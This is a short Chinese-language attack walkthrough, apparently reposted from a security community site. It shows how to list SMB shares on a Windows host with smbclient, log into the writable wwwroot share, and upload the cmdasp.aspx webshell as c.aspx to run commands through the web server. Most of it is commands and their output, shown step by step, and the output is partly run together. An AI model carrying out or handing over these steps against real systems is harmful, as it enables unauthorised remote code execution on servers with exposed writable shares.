本文来自无问社区，更多实战内容可前往查看http://www.wwlib.cn/index.php/artread/artid/13337.html

操作步骤

枚举目标主机开启的共享服务信息：10.0.0.6

smbclient -L //10.0.0.6 -U spotWARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password: Sharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareCertEnroll      Disk      Active Directory Certificate Services shareIPC$            IPC       Remote IPCNETLOGON        Disk      Logon server share SYSVOL          Disk      Logon server share temp            Disk      tools           Disk      transcripts     Disk      wwwroot         Disk      

登录共享：wwwroot

smbclient //10.0.0.6/wwwroot -U spotWARNING: The "syslog" option is deprecated
Enter WORKGROUP\spot's password: 
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Sat Aug 25 16:57:52 2018..                                  D        0  Sat Aug 25 16:57:52 2018aspnet_client                       D        0  Tue Jul 31 20:11:20 2018iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018iisstart.htm                        A        3  Tue Jul 31 19:38:23 2018

将 webshell 上传到 ：wwwroot

put /usr/share/webshells/aspx/cmdasp.aspx c.aspxputting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
smb: \> ls.                                   D        0  Sat Aug 25 16:59:47 2018..                                  D        0  Sat Aug 25 16:59:47 2018aspnet_client                       D        0  Tue Jul 31 20:11:20 2018c.aspx                              A     1400  Sat Aug 25 16:59:47 2018iis-85.png                          A    99710  Tue Jul 31 19:35:48 2018iisstart.htm                        A        3  Tue Jul 31 19:38:23 20186463487 blocks of size 4096. 3032260 blocks available

与上图相同：

攻击者现在可以通过以下方式访问新上传的 webshell 并开始执行命令：http://10.0.0.6/c.aspx.